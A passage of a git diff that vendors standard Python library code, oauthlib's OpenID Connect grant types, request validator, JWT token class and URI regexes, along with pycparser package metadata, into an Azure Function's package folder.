super().add_id_token(token, token_handler, request, nonce=request.nonce) + + def openid_authorization_validator(self, request): + """Additional validation when following the Authorization Code flow. + """ + request_info = super().openid_authorization_validator(request) + if not request_info: # returns immediately if OAuth2.0 + return request_info + + # REQUIRED if the Response Type of the request is `code + # id_token` or `code id_token token` and OPTIONAL when the + # Response Type of the request is `code token`. It is a string + # value used to associate a Client session with an ID Token, + # and to mitigate replay attacks. The value is passed through + # unmodified from the Authentication Request to the ID + # Token. Sufficient entropy MUST be present in the `nonce` + # values used to prevent attackers from guessing values. For + # implementation notes, see Section 15.5.2. + if request.response_type in ["code id_token", "code id_token token"]: + if not request.nonce: + raise InvalidRequestError( + request=request, + description='Request is missing mandatory nonce parameter.' + ) + return request_info diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/implicit.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/implicit.py new file mode 100644 index 0000000..8f4c31a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/implicit.py @@ -0,0 +1,51 @@ +""" +oauthlib.openid.connect.core.grant_types +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +import logging + +from oauthlib.oauth2.rfc6749.errors import InvalidRequestError +from oauthlib.oauth2.rfc6749.grant_types.implicit import ( + ImplicitGrant as OAuth2ImplicitGrant, +) + +from .base import GrantTypeBase + +log = logging.getLogger(__name__) + + +class ImplicitGrant(GrantTypeBase): + + def __init__(self, request_validator=None, **kwargs): + self.proxy_target = OAuth2ImplicitGrant( + request_validator=request_validator, **kwargs) + self.register_response_type('id_token') + self.register_response_type('id_token token') + self.custom_validators.post_auth.append( + self.openid_authorization_validator) + self.register_token_modifier(self.add_id_token) + + def add_id_token(self, token, token_handler, request): + if 'state' not in token and request.state: + token['state'] = request.state + return super().add_id_token(token, token_handler, request, nonce=request.nonce) + + def openid_authorization_validator(self, request): + """Additional validation when following the implicit flow. + """ + request_info = super().openid_authorization_validator(request) + if not request_info: # returns immediately if OAuth2.0 + return request_info + + # REQUIRED. String value used to associate a Client session with an ID + # Token, and to mitigate replay attacks. The value is passed through + # unmodified from the Authentication Request to the ID Token. + # Sufficient entropy MUST be present in the nonce values used to + # prevent attackers from guessing values. For implementation notes, see + # Section 15.5.2. + if not request.nonce: + raise InvalidRequestError( + request=request, + description='Request is missing mandatory nonce parameter.' + ) + return request_info diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/refresh_token.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/refresh_token.py new file mode 100644 index 0000000..3dd684a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/refresh_token.py @@ -0,0 +1,34 @@ +""" +oauthlib.openid.connect.core.grant_types +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +import logging + +from oauthlib.oauth2.rfc6749.grant_types.refresh_token import ( + RefreshTokenGrant as OAuth2RefreshTokenGrant, +) + +from .base import GrantTypeBase + +log = logging.getLogger(__name__) + + +class RefreshTokenGrant(GrantTypeBase): + + def __init__(self, request_validator=None, **kwargs): + self.proxy_target = OAuth2RefreshTokenGrant( + request_validator=request_validator, **kwargs) + self.register_token_modifier(self.add_id_token) + + def add_id_token(self, token, token_handler, request): + """ + Construct an initial version of id_token, and let the + request_validator sign or encrypt it. + + The authorization_code version of this method is used to + retrieve the nonce accordingly to the code storage. + """ + if not self.request_validator.refresh_id_token(request): + return token + + return super().add_id_token(token, token_handler, request) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/request_validator.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/request_validator.py new file mode 100644 index 0000000..4fe2e14 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/request_validator.py @@ -0,0 +1,320 @@ +""" +oauthlib.openid.connect.core.request_validator +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +import logging + +from oauthlib.oauth2.rfc6749.request_validator import ( + RequestValidator as OAuth2RequestValidator, +) + +log = logging.getLogger(__name__) + + +class RequestValidator(OAuth2RequestValidator): + + def get_authorization_code_scopes(self, client_id, code, redirect_uri, request): + """ Extracts scopes from saved authorization code. + + The scopes returned by this method is used to route token requests + based on scopes passed to Authorization Code requests. + + With that the token endpoint knows when to include OpenIDConnect + id_token in token response only based on authorization code scopes. + + Only code param should be sufficient to retrieve grant code from + any storage you are using, `client_id` and `redirect_uri` can have a + blank value `""` don't forget to check it before using those values + in a select query if a database is used. + + :param client_id: Unicode client identifier + :param code: Unicode authorization code grant + :param redirect_uri: Unicode absolute URI + :return: A list of scope + + Method is used by: + - Authorization Token Grant Dispatcher + """ + raise NotImplementedError('Subclasses must implement this method.') + + def get_authorization_code_nonce(self, client_id, code, redirect_uri, request): + """ Extracts nonce from saved authorization code. + + If present in the Authentication Request, Authorization + Servers MUST include a nonce Claim in the ID Token with the + Claim Value being the nonce value sent in the Authentication + Request. Authorization Servers SHOULD perform no other + processing on nonce values used. The nonce value is a + case-sensitive string. + + Only code param should be sufficient to retrieve grant code from + any storage you are using. However, `client_id` and `redirect_uri` + have been validated and can be used also. + + :param client_id: Unicode client identifier + :param code: Unicode authorization code grant + :param redirect_uri: Unicode absolute URI + :return: Unicode nonce + + Method is used by: + - Authorization Token Grant Dispatcher + """ + raise NotImplementedError('Subclasses must implement this method.') + + def get_jwt_bearer_token(self, token, token_handler, request): + """Get JWT Bearer token or OpenID Connect ID token + + If using OpenID Connect this SHOULD call `oauthlib.oauth2.RequestValidator.get_id_token` + + :param token: A Bearer token dict + :param token_handler: the token handler (BearerToken class) + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :return: The JWT Bearer token or OpenID Connect ID token (a JWS signed JWT) + + Method is used by JWT Bearer and OpenID Connect tokens: + - JWTToken.create_token + """ + raise NotImplementedError('Subclasses must implement this method.') + + def get_id_token(self, token, token_handler, request): + """Get OpenID Connect ID token + + This method is OPTIONAL and is NOT RECOMMENDED. + `finalize_id_token` SHOULD be implemented instead. However, if you + want a full control over the minting of the `id_token`, you + MAY want to override `get_id_token` instead of using + `finalize_id_token`. + + In the OpenID Connect workflows when an ID Token is requested this method is called. + Subclasses should implement the construction, signing and optional encryption of the + ID Token as described in the OpenID Connect spec. + + In addition to the standard OAuth2 request properties, the request may also contain + these OIDC specific properties which are useful to this method: + + - nonce, if workflow is implicit or hybrid and it was provided + - claims, if provided to the original Authorization Code request + + The token parameter is a dict which may contain an ``access_token`` entry, in which + case the resulting ID Token *should* include a calculated ``at_hash`` claim. + + Similarly, when the request parameter has a ``code`` property defined, the ID Token + *should* include a calculated ``c_hash`` claim. + + http://openid.net/specs/openid-connect-core-1_0.html (sections `3.1.3.6`_, `3.2.2.10`_, `3.3.2.11`_) + + .. _`3.1.3.6`: http://openid.net/specs/openid-connect-core-1_0.html#CodeIDToken + .. _`3.2.2.10`: http://openid.net/specs/openid-connect-core-1_0.html#ImplicitIDToken + .. _`3.3.2.11`: http://openid.net/specs/openid-connect-core-1_0.html#HybridIDToken + + :param token: A Bearer token dict + :param token_handler: the token handler (BearerToken class) + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :return: The ID Token (a JWS signed JWT) + """ + return None + + def finalize_id_token(self, id_token, token, token_handler, request): + """Finalize OpenID Connect ID token & Sign or Encrypt. + + In the OpenID Connect workflows when an ID Token is requested + this method is called. Subclasses should implement the + construction, signing and optional encryption of the ID Token + as described in the OpenID Connect spec. + + The `id_token` parameter is a dict containing a couple of OIDC + technical fields related to the specification. Prepopulated + attributes are: + + - `aud`, equals to `request.client_id`. + - `iat`, equals to current time. + - `nonce`, if present, is equals to the `nonce` from the + authorization request. + - `at_hash`, hash of `access_token`, if relevant. + - `c_hash`, hash of `code`, if relevant. + + This method MUST provide required fields as below: + + - `iss`, REQUIRED. Issuer Identifier for the Issuer of the response. + - `sub`, REQUIRED. Subject Identifier + - `exp`, REQUIRED. Expiration time on or after which the ID + Token MUST NOT be accepted by the RP when performing + authentication with the OP. + + Additionals claims must be added, note that `request.scope` + should be used to determine the list of claims. + + More information can be found at `OpenID Connect Core#Claims`_ + + .. _`OpenID Connect Core#Claims`: https://openid.net/specs/openid-connect-core-1_0.html#Claims + + :param id_token: A dict containing technical fields of id_token + :param token: A Bearer token dict + :param token_handler: the token handler (BearerToken class) + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :return: The ID Token (a JWS signed JWT or JWE encrypted JWT) + """ + raise NotImplementedError('Subclasses must implement this method.') + + def validate_jwt_bearer_token(self, token, scopes, request): + """Ensure the JWT Bearer token or OpenID Connect ID token are valids and authorized access to scopes. + + If using OpenID Connect this SHOULD call `oauthlib.oauth2.RequestValidator.get_id_token` + + If not using OpenID Connect this can `return None` to avoid 5xx rather 401/3 response. + + OpenID connect core 1.0 describe how to validate an id_token: + - http://openid.net/specs/openid-connect-core-1_0.html#IDTokenValidation + - http://openid.net/specs/openid-connect-core-1_0.html#ImplicitIDTValidation + - http://openid.net/specs/openid-connect-core-1_0.html#HybridIDTValidation + - http://openid.net/specs/openid-connect-core-1_0.html#HybridIDTValidation2 + + :param token: Unicode Bearer token + :param scopes: List of scopes (defined by you) + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is indirectly used by all core OpenID connect JWT token issuing grant types: + - Authorization Code Grant + - Implicit Grant + - Hybrid Grant + """ + raise NotImplementedError('Subclasses must implement this method.') + + def validate_id_token(self, token, scopes, request): + """Ensure the id token is valid and authorized access to scopes. + + OpenID connect core 1.0 describe how to validate an id_token: + - http://openid.net/specs/openid-connect-core-1_0.html#IDTokenValidation + - http://openid.net/specs/openid-connect-core-1_0.html#ImplicitIDTValidation + - http://openid.net/specs/openid-connect-core-1_0.html#HybridIDTValidation + - http://openid.net/specs/openid-connect-core-1_0.html#HybridIDTValidation2 + + :param token: Unicode Bearer token + :param scopes: List of scopes (defined by you) + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is indirectly used by all core OpenID connect JWT token issuing grant types: + - Authorization Code Grant + - Implicit Grant + - Hybrid Grant + """ + raise NotImplementedError('Subclasses must implement this method.') + + def validate_silent_authorization(self, request): + """Ensure the logged in user has authorized silent OpenID authorization. + + Silent OpenID authorization allows access tokens and id tokens to be + granted to clients without any user prompt or interaction. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is used by: + - OpenIDConnectAuthCode + - OpenIDConnectImplicit + - OpenIDConnectHybrid + """ + raise NotImplementedError('Subclasses must implement this method.') + + def validate_silent_login(self, request): + """Ensure session user has authorized silent OpenID login. + + If no user is logged in or has not authorized silent login, this + method should return False. + + If the user is logged in but associated with multiple accounts and + not selected which one to link to the token then this method should + raise an oauthlib.oauth2.AccountSelectionRequired error. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is used by: + - OpenIDConnectAuthCode + - OpenIDConnectImplicit + - OpenIDConnectHybrid + """ + raise NotImplementedError('Subclasses must implement this method.') + + def validate_user_match(self, id_token_hint, scopes, claims, request): + """Ensure client supplied user id hint matches session user. + + If the sub claim or id_token_hint is supplied then the session + user must match the given ID. + + :param id_token_hint: User identifier string. + :param scopes: List of OAuth 2 scopes and OpenID claims (strings). + :param claims: OpenID Connect claims dict. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is used by: + - OpenIDConnectAuthCode + - OpenIDConnectImplicit + - OpenIDConnectHybrid + """ + raise NotImplementedError('Subclasses must implement this method.') + + def get_userinfo_claims(self, request): + """Return the UserInfo claims in JSON or Signed or Encrypted. + + The UserInfo Claims MUST be returned as the members of a JSON object + unless a signed or encrypted response was requested during Client + Registration. The Claims defined in Section 5.1 can be returned, as can + additional Claims not specified there. + + For privacy reasons, OpenID Providers MAY elect to not return values for + some requested Claims. + + If a Claim is not returned, that Claim Name SHOULD be omitted from the + JSON object representing the Claims; it SHOULD NOT be present with a + null or empty string value. + + The sub (subject) Claim MUST always be returned in the UserInfo + Response. + + Upon receipt of the UserInfo Request, the UserInfo Endpoint MUST return + the JSON Serialization of the UserInfo Response as in Section 13.3 in + the HTTP response body unless a different format was specified during + Registration [OpenID.Registration]. + + If the UserInfo Response is signed and/or encrypted, then the Claims are + returned in a JWT and the content-type MUST be application/jwt. The + response MAY be encrypted without also being signed. If both signing and + encryption are requested, the response MUST be signed then encrypted, + with the result being a Nested JWT, as defined in [JWT]. + + If signed, the UserInfo Response SHOULD contain the Claims iss (issuer) + and aud (audience) as members. The iss value SHOULD be the OP's Issuer + Identifier URL. The aud value SHOULD be or include the RP's Client ID + value. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: Claims as a dict OR JWT/JWS/JWE as a string + + Method is used by: + UserInfoEndpoint + """ + + def refresh_id_token(self, request): + """Whether the id token should be refreshed. Default, True + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is used by: + RefreshTokenGrant + """ + return True diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/tokens.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/tokens.py new file mode 100644 index 0000000..7dcdf37 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/tokens.py @@ -0,0 +1,46 @@ +""" +authlib.openid.connect.core.tokens +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +This module contains methods for adding JWT tokens to requests. +""" +from oauthlib.oauth2.rfc6749.tokens import TokenBase, random_token_generator, get_token_from_header + + +class JWTToken(TokenBase): + __slots__ = ( + 'request_validator', 'token_generator', + 'refresh_token_generator', 'expires_in' + ) + + def __init__(self, request_validator=None, token_generator=None, + expires_in=None, refresh_token_generator=None): + self.request_validator = request_validator + self.token_generator = token_generator or random_token_generator + self.refresh_token_generator = ( + refresh_token_generator or self.token_generator + ) + self.expires_in = expires_in or 3600 + + def create_token(self, request, refresh_token=False): + """Create a JWT Token, using requestvalidator method.""" + + if callable(self.expires_in): + expires_in = self.expires_in(request) + else: + expires_in = self.expires_in + + request.expires_in = expires_in + + return self.request_validator.get_jwt_bearer_token(None, None, request) + + def validate_request(self, request): + token = get_token_from_header(request) + return self.request_validator.validate_jwt_bearer_token( + token, request.scopes, request) + + def estimate_type(self, request): + token = get_token_from_header(request) + if token and token.startswith('ey') and token.count('.') in (2, 4): + return 10 + return 0 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/signals.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/signals.py new file mode 100644 index 0000000..5f62534 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/signals.py @@ -0,0 +1,40 @@ +""" + Implements signals based on blinker if available, otherwise + falls silently back to a noop. Shamelessly stolen from flask.signals: + https://github.com/mitsuhiko/flask/blob/master/flask/signals.py +""" +signals_available = False +try: + from blinker import Namespace + signals_available = True +except ImportError: # noqa + class Namespace: + def signal(self, name, doc=None): + return _FakeSignal(name, doc) + + class _FakeSignal: + """If blinker is unavailable, create a fake class with the same + interface that allows sending of signals but will fail with an + error on anything else. Instead of doing anything on send, it + will just ignore the arguments and do nothing instead. + """ + + def __init__(self, name, doc=None): + self.name = name + self.__doc__ = doc + def _fail(self, *args, **kwargs): + raise RuntimeError('signalling support is unavailable ' + 'because the blinker library is ' + 'not installed.') + send = lambda *a, **kw: None + connect = disconnect = has_receivers_for = receivers_for = \ + temporarily_connected_to = connected_to = _fail + del _fail + +# The namespace for code signals. If you are not oauthlib code, do +# not put signals in here. Create your own namespace instead. +_signals = Namespace() + + +# Core signals. +scope_changed = _signals.signal('scope-changed') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/uri_validate.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/uri_validate.py new file mode 100644 index 0000000..ae461ad --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/uri_validate.py @@ -0,0 +1,190 @@ +""" +Regex for URIs + +These regex are directly derived from the collected ABNF in RFC3986 +(except for DIGIT, ALPHA and HEXDIG, defined by RFC2234). + +They should be processed with re.VERBOSE. + +Thanks Mark Nottingham for this code - https://gist.github.com/138549 +""" +import re + +# basics + +DIGIT = r"[\x30-\x39]" + +ALPHA = r"[\x41-\x5A\x61-\x7A]" + +HEXDIG = r"[\x30-\x39A-Fa-f]" + +# pct-encoded = "%" HEXDIG HEXDIG +pct_encoded = r" %% %(HEXDIG)s %(HEXDIG)s" % locals() + +# unreserved = ALPHA / DIGIT / "-" / "." / "_" / "~" +unreserved = r"(?: %(ALPHA)s | %(DIGIT)s | \- | \. | _ | ~ )" % locals() + +# gen-delims = ":" / "/" / "?" / "#" / "[" / "]" / "@" +gen_delims = r"(?: : | / | \? | \# | \[ | \] | @ )" + +# sub-delims = "!" / "$" / "&" / "'" / "(" / ")" +# / "*" / "+" / "," / ";" / "=" +sub_delims = r"""(?: ! | \$ | & | ' | \( | \) | + \* | \+ | , | ; | = )""" + +# pchar = unreserved / pct-encoded / sub-delims / ":" / "@" +pchar = r"(?: %(unreserved)s | %(pct_encoded)s | %(sub_delims)s | : | @ )" % locals( +) + +# reserved = gen-delims / sub-delims +reserved = r"(?: %(gen_delims)s | %(sub_delims)s )" % locals() + + +# scheme + +# scheme = ALPHA *( ALPHA / DIGIT / "+" / "-" / "." ) +scheme = r"%(ALPHA)s (?: %(ALPHA)s | %(DIGIT)s | \+ | \- | \. )*" % locals() + + +# authority + +# dec-octet = DIGIT ; 0-9 +# / %x31-39 DIGIT ; 10-99 +# / "1" 2DIGIT ; 100-199 +# / "2" %x30-34 DIGIT ; 200-249 +# / "25" %x30-35 ; 250-255 +dec_octet = r"""(?: %(DIGIT)s | + [\x31-\x39] %(DIGIT)s | + 1 %(DIGIT)s{2} | + 2 [\x30-\x34] %(DIGIT)s | + 25 [\x30-\x35] + ) +""" % locals() + +# IPv4address = dec-octet "." dec-octet "." dec-octet "." dec-octet +IPv4address = r"%(dec_octet)s \. %(dec_octet)s \. %(dec_octet)s \. %(dec_octet)s" % locals( +) + +# IPv6address +IPv6address = r"([A-Fa-f0-9:]+:+)+[A-Fa-f0-9]+" + +# IPvFuture = "v" 1*HEXDIG "." 1*( unreserved / sub-delims / ":" ) +IPvFuture = r"v %(HEXDIG)s+ \. (?: %(unreserved)s | %(sub_delims)s | : )+" % locals() + +# IP-literal = "[" ( IPv6address / IPvFuture ) "]" +IP_literal = r"\[ (?: %(IPv6address)s | %(IPvFuture)s ) \]" % locals() + +# reg-name = *( unreserved / pct-encoded / sub-delims ) +reg_name = r"(?: %(unreserved)s | %(pct_encoded)s | %(sub_delims)s )*" % locals() + +# userinfo = *( unreserved / pct-encoded / sub-delims / ":" ) +userinfo = r"(?: %(unreserved)s | %(pct_encoded)s | %(sub_delims)s | : )" % locals( +) + +# host = IP-literal / IPv4address / reg-name +host = r"(?: %(IP_literal)s | %(IPv4address)s | %(reg_name)s )" % locals() + +# port = *DIGIT +port = r"(?: %(DIGIT)s )*" % locals() + +# authority = [ userinfo "@" ] host [ ":" port ] +authority = r"(?: %(userinfo)s @)? %(host)s (?: : %(port)s)?" % locals() + +# Path + +# segment = *pchar +segment = r"%(pchar)s*" % locals() + +# segment-nz = 1*pchar +segment_nz = r"%(pchar)s+" % locals() + +# segment-nz-nc = 1*( unreserved / pct-encoded / sub-delims / "@" ) +# ; non-zero-length segment without any colon ":" +segment_nz_nc = r"(?: %(unreserved)s | %(pct_encoded)s | %(sub_delims)s | @ )+" % locals() + +# path-abempty = *( "/" segment ) +path_abempty = r"(?: / %(segment)s )*" % locals() + +# path-absolute = "/" [ segment-nz *( "/" segment ) ] +path_absolute = r"/ (?: %(segment_nz)s (?: / %(segment)s )* )?" % locals() + +# path-noscheme = segment-nz-nc *( "/" segment ) +path_noscheme = r"%(segment_nz_nc)s (?: / %(segment)s )*" % locals() + +# path-rootless = segment-nz *( "/" segment ) +path_rootless = r"%(segment_nz)s (?: / %(segment)s )*" % locals() + +# path-empty = 0 +path_empty = r"" # FIXME + +# path = path-abempty ; begins with "/" or is empty +# / path-absolute ; begins with "/" but not "//" +# / path-noscheme ; begins with a non-colon segment +# / path-rootless ; begins with a segment +# / path-empty ; zero characters +path = r"""(?: %(path_abempty)s | + %(path_absolute)s | + %(path_noscheme)s | + %(path_rootless)s | + %(path_empty)s + ) +""" % locals() + +### Query and Fragment + +# query = *( pchar / "/" / "?" ) +query = r"(?: %(pchar)s | / | \? )*" % locals() + +# fragment = *( pchar / "/" / "?" ) +fragment = r"(?: %(pchar)s | / | \? )*" % locals() + +# URIs + +# hier-part = "//" authority path-abempty +# / path-absolute +# / path-rootless +# / path-empty +hier_part = r"""(?: (?: // %(authority)s %(path_abempty)s ) | + %(path_absolute)s | + %(path_rootless)s | + %(path_empty)s + ) +""" % locals() + +# relative-part = "//" authority path-abempty +# / path-absolute +# / path-noscheme +# / path-empty +relative_part = r"""(?: (?: // %(authority)s %(path_abempty)s ) | + %(path_absolute)s | + %(path_noscheme)s | + %(path_empty)s + ) +""" % locals() + +# relative-ref = relative-part [ "?" query ] [ "#" fragment ] +relative_ref = r"%(relative_part)s (?: \? %(query)s)? (?: \# %(fragment)s)?" % locals( +) + +# URI = scheme ":" hier-part [ "?" query ] [ "#" fragment ] +URI = r"^(?: %(scheme)s : %(hier_part)s (?: \? %(query)s )? (?: \# %(fragment)s )? )$" % locals( +) + +# URI-reference = URI / relative-ref +URI_reference = r"^(?: %(URI)s | %(relative_ref)s )$" % locals() + +# absolute-URI = scheme ":" hier-part [ "?" query ] +absolute_URI = r"^(?: %(scheme)s : %(hier_part)s (?: \? %(query)s )? )$" % locals( +) + + +def is_uri(uri): + return re.match(URI, uri, re.VERBOSE) + + +def is_uri_reference(uri): + return re.match(URI_reference, uri, re.VERBOSE) + + +def is_absolute_uri(uri): + return re.match(absolute_URI, uri, re.VERBOSE) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/LICENSE new file mode 100644 index 0000000..de06a37 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/LICENSE @@ -0,0 +1,27 @@ +pycparser -- A C parser in Python + +Copyright (c) 2008-2020, Eli Bendersky +All rights reserved. + +Redistribution and use in source and binary forms, with or without modification, +are permitted provided that the following conditions are met: + +* Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. +* Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. +* Neither the name of Eli Bendersky nor the names of its contributors may + be used to endorse or promote products derived from this software without + specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE +LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE +GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT +LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT +OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/METADATA new file mode 100644 index 0000000..8df7783 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/METADATA @@ -0,0 +1,31 @@ +Metadata-Version: 2.1 +Name: pycparser +Version: 2.21 +Summary: C parser in Python +Home-page: https://github.com/eliben/pycparser +Author: Eli Bendersky +Author-email: eliben@gmail.com +Maintainer: Eli Bendersky +License: BSD +Platform: Cross Platform +Classifier: Development Status :: 5 - Production/Stable +Classifier: License :: OSI Approved :: BSD License +Classifier: Programming Language :: Python :: 2 +Classifier: Programming Language :: Python :: 2.7 +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.4 +Classifier: Programming Language :: Python :: 3.5 +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Requires-Python: >=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.* + + +pycparser is a complete parser of the C language, written in +pure Python using the PLY parsing library. +It parses C code into an AST and can serve as a front-end for +C compilers or analysis tools. + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/RECORD new file mode 100644 index 0000000..e230498 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/RECORD @@ -0,0 +1,41 @@ +pycparser-2.21.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +pycparser-2.21.dist-info/LICENSE,sha256=Pn3yW437ZYyakVAZMNTZQ7BQh6g0fH4rQyVhavU1BHs,1536 +pycparser-2.21.dist-info/METADATA,sha256=GvTEQA9yKj0nvP4mknfoGpMvjaJXCQjQANcQHrRrAxc,1108 +pycparser-2.21.dist-info/RECORD,, +pycparser-2.21.dist-info/WHEEL,sha256=kGT74LWyRUZrL4VgLh6_g12IeVl_9u9ZVhadrgXZUEY,110 +pycparser-2.21.dist-info/top_level.txt,sha256=c-lPcS74L_8KoH7IE6PQF5ofyirRQNV4VhkbSFIPeWM,10 +pycparser/__init__.py,sha256=WUEp5D0fuHBH9Q8c1fYvR2eKWfj-CNghLf2MMlQLI1I,2815 +pycparser/__pycache__/__init__.cpython-39.pyc,, +pycparser/__pycache__/_ast_gen.cpython-39.pyc,, +pycparser/__pycache__/_build_tables.cpython-39.pyc,, +pycparser/__pycache__/ast_transforms.cpython-39.pyc,, +pycparser/__pycache__/c_ast.cpython-39.pyc,, +pycparser/__pycache__/c_generator.cpython-39.pyc,, +pycparser/__pycache__/c_lexer.cpython-39.pyc,, +pycparser/__pycache__/c_parser.cpython-39.pyc,, +pycparser/__pycache__/lextab.cpython-39.pyc,, +pycparser/__pycache__/plyparser.cpython-39.pyc,, +pycparser/__pycache__/yacctab.cpython-39.pyc,, +pycparser/_ast_gen.py,sha256=0JRVnDW-Jw-3IjVlo8je9rbAcp6Ko7toHAnB5zi7h0Q,10555 +pycparser/_build_tables.py,sha256=oZCd3Plhq-vkV-QuEsaahcf-jUI6-HgKsrAL9gvFzuU,1039 +pycparser/_c_ast.cfg,sha256=ld5ezE9yzIJFIVAUfw7ezJSlMi4nXKNCzfmqjOyQTNo,4255 +pycparser/ast_transforms.py,sha256=GTMYlUgWmXd5wJVyovXY1qzzAqjxzCpVVg0664dKGBs,5691 +pycparser/c_ast.py,sha256=HWeOrfYdCY0u5XaYhE1i60uVyE3yMWdcxzECUX-DqJw,31445 +pycparser/c_generator.py,sha256=yi6Mcqxv88J5ue8k5-mVGxh3iJ37iD4QyF-sWcGjC-8,17772 +pycparser/c_lexer.py,sha256=xCpjIb6vOUebBJpdifidb08y7XgAsO3T1gNGXJT93-w,17167 +pycparser/c_parser.py,sha256=_8y3i52bL6SUK21KmEEl0qzHxe-0eZRzjZGkWg8gQ4A,73680 +pycparser/lextab.py,sha256=fIxBAHYRC418oKF52M7xb8_KMj3K-tHx0TzZiKwxjPM,8504 +pycparser/ply/__init__.py,sha256=q4s86QwRsYRa20L9ueSxfh-hPihpftBjDOvYa2_SS2Y,102 +pycparser/ply/__pycache__/__init__.cpython-39.pyc,, +pycparser/ply/__pycache__/cpp.cpython-39.pyc,, +pycparser/ply/__pycache__/ctokens.cpython-39.pyc,, +pycparser/ply/__pycache__/lex.cpython-39.pyc,, +pycparser/ply/__pycache__/yacc.cpython-39.pyc,, +pycparser/ply/__pycache__/ygen.cpython-39.pyc,, 